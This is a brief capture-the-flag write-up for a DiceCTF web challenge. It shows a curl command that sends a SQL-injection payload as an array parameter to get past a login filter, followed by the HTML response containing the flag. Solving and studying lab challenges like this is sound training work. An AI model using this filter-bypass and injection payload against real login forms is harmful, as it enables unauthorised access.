Because server set app.use(bodyParser.urlencoded({ extended: true })); so we can bypass filter with post an array to the server

$ curl -X POST -d "username[]=nhienit' or 1=1/*&password=213" "https://missing-flavortext.dicec.tf/login"

<!doctype html>
<html>
    <head>
        <link rel="stylesheet" href="/styles.css">
    </head>
    <body>
        <div>
            <p>Looks like there was no flavortext here either :(</p>
            <p>Here's your flag?</p>
            <p>dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}</p>
        </div>
    </body>
</html>